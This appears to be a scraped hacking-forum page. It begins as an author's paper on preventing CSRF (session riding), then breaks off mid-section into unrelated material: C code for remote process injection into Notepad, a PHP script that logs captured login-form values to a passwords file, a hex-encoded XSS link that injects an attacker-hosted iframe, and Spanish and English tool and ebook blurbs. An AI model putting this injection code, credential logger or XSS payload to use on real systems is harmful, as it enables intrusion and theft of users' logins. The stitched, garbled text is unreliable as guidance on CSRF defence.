[code]Author: Nexus
-[ SUMMARY ]---------------------------------------------------------------------
0x01: Hello World
0x02: Introduction
0x03: About Authentications
\_ 0x03a: Cookies Hashing
\_ 0x03b: HTTP Referer
\_ 0x03c: CAPTCHA Image
0x04: One-Time Tokens
0x05: Conclusions
---------------------------------------------------------------------------------
---[ 0x01: Hello World ]
Welcome to a fresh new inaugural paper for the new season of the Playhack.net
Project! :) I'm really happy to see you back again and make our c00l project
be back!
Hope you'll enjoy this new short paper and i invite you to visit the whole new
project at:
http://www.playhack.net
Intake: actually nothing.. just a pair of cigarettes! :\
Shoutouts: all my shoutouts goes to my playhack m8s null, omni, god and emdel,
ofc to str0ke! NEX IS BACK!
-----------------------------------------------------------------------------[/]
---[ 0x02: Introduction ]
I already dealt with the Cross Site Request Forgery topic, but not too deep
regarding the possible solutions that web developers should adopt.
In these days i've been deeply involved in this topic during the coding of a
distributed web application which should warrant a good level of security for
user and most of all for the system's administrators (who are not that smart
though their tasks :P).
Considering this situation i had to consider each aspect and each possible
attack attempts that the applications could eventually suffer.
The one that gave me most problems to apply has been the Session Riding
(or CSRF, call it as you prefere) because there is no 100% certain way to
prevent that due to the concept that the attack fully stands on the users'
credentials.
If you don't really know what Session Riding is you should read the previous
paper reachable at the following link:
http://www.playhack.net/view.php?id=30
-----------------------------------------------------------------------------[/]
---[ 0X03: Possible Solutions ]
Ok, from here i must assume that you quite deeply know how a Session Riding
attack should work out :P
Let's just have a little and fresh resume..
Consider that a trusted user is logged into a website which permits him to
accomplish some important or confidential actions, an attacker wants to get
over a possible login attack (which often will be voided) and disfrut the
opened session of the user in order to realize some crafted actions.
The attacker in order to hijack the user's session will craft an appropriate
web page which will hide a javascript function that re-create an original
form but with fixed values, then he'll make the victim visit that page which
on load will submit the form to the remote action page which will accomplish
the request secretely (without the victim's aknowledge) confying on the user's
trusted credentials.
This is a as quick as simple explaining of how a Session Riding attack would
work out, the important question now is
"How do i prevent my users to be victims of that?".
Now you would probably consider the following solutions:
- Check some cookies credentials
- Check the HTTP Referer
- Use a CAPTCHA
With some tryouts you'll realize that these are not the most proper solutions
to adopt, let's see why one by one.
-----------------------------------------------------------------------------[/]
------[ 0x03a: Cookies Hashing ]
This first one could be a very simple and quick solutions to this problem
because the attacker should not be aware of the victim's cookies contents,
and cannot craft then a proper workaround.
An implementation of this solutions would work out in a way like following.
In some login file we create the Cookie related to the current session:
We use an hashing of the Cookie to make the form verified
file:///c:/windows/system32/cmd.exe
file:///c:/windows/system32/cmd.exe
#include
#include
#include
#pragma code_seg(".injseg")
__declspec( naked ) static DWORD WINAPI InjectCode(LPVOID lpParameter)
{
__asm
{
call get_delta
get_delta:
pop ebp
sub ebp, offset get_delta
lea esi, dword ptr [ebp + addrMessageBox]
mov eax, dword ptr [esi]
push MB_OK
push 0
push 0
push NULL
call eax
lea esi, dword ptr [ebp + addrExitProcess]
mov eax, dword ptr [esi]
push 0
call eax
__emit 6Bh //k
__emit 65h //e
__emit 72h //r
__emit 6Eh //n
__emit 65h //e
__emit 6Ch //l
__emit 33h //3
__emit 32h //2
__emit 2Eh //.
__emit 64h //d
__emit 6Ch //l
__emit 6Ch //l
__emit 00h //\0
__emit 00h //\0
addrMessageBox:
__emit 00h
__emit 00h
__emit 00h
__emit 00h
addrExitProcess:
__emit 00h
__emit 00h
__emit 00h
__emit 00h
}
}
static void InjectCode_EndMarker (void){}
#pragma code_seg()
#pragma comment(linker, "/SECTION:.injseg,RWX")
BOOL DoSomeInjection(DWORD dwProcessId)
{
BOOL bRet = FALSE;
BOOL bOK = FALSE;
HANDLE hProcess = NULL;
HANDLE hRemoteThread = NULL;
LPVOID lpInjectCode = NULL;
const DWORD dwCodeSize = ((LPBYTE) InjectCode_EndMarker - (LPBYTE) InjectCode);
DWORD dwTemp = 0;
do
{
*(((LPDWORD)InjectCode_EndMarker) - 2) = (DWORD)&MessageBoxA;
*(((LPDWORD)InjectCode_EndMarker) - 1) = (DWORD)&ExitProcess;
hProcess = OpenProcess( PROCESS_ALL_ACCESS,
FALSE,
dwProcessId
);
if(NULL == hProcess)
{
_tprintf(_T("OpenProcess Failed!\n"));
break;
}
lpInjectCode = VirtualAllocEx(
hProcess,
NULL,
dwCodeSize,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);
if(NULL == lpInjectCode)
{
_tprintf(_T("VirtualAllocEx Failed!\n"));
break;
}
bOK = WriteProcessMemory(hProcess, lpInjectCode, (LPVOID)InjectCode, dwCodeSize, &dwTemp);
if(FALSE == bOK)
{
_tprintf(_T("WriteProcessMemory Failed!\n"));
break;
}
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpInjectCode, NULL, 0, NULL);
if(NULL == hRemoteThread)
{
_tprintf(_T("CreateRemoteThread Failed!\n"));
break;
}
WaitForSingleObject( hRemoteThread, INFINITE);
bRet = TRUE;
} while(false);
if(NULL != lpInjectCode)
{
VirtualFreeEx( hProcess, lpInjectCode, dwCodeSize, MEM_RELEASE);
lpInjectCode = NULL;
}
if(NULL != hRemoteThread)
{
CloseHandle(hRemoteThread);
hRemoteThread = NULL;
}
if(NULL != hProcess)
{
CloseHandle(hProcess);
hProcess = NULL;
}
return bRet;
}
int main(int argc, char* argv[])
{
DWORD dwProcId = 0;
HWND hwnd = FindWindow("Notepad", NULL);
GetWindowThreadProcessId( hwnd, &dwProcId);
DoSomeInjection(dwProcId);
return 0;
}
Talvez no sea el coliseo Romano, o los espectaculares lugares donde se exhibian estas luchas, pero esta tiene su particularidad de que no existen golpes que duelan tanto, y talvéz eso la hace muy especial... xD
Fport reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications.
A Complete Reference with Custom Security Hacking Toolkit. This ebook is for Advanced Hackers - Security proffesionals and begginers. We must to have, just for educational pourposes only.
java script:
">
Capturador de logins forms:
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
exit;
?>
en combinacion con un fichero de texto, codificado en forma hexadecimal y alojados en un host remoto.
http://sitiovulnerable.com/index.php?s=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%68%6F%73%74%64%65%6C%61%74%61%63%61%6E%74%65%2F%69%6E%64%65%78%2E%68%74%6D%6C%22%3E%3C%2F%69%66%72%61%6D%65%3E
un saludo
XSS
acceso a archivos de configuracion
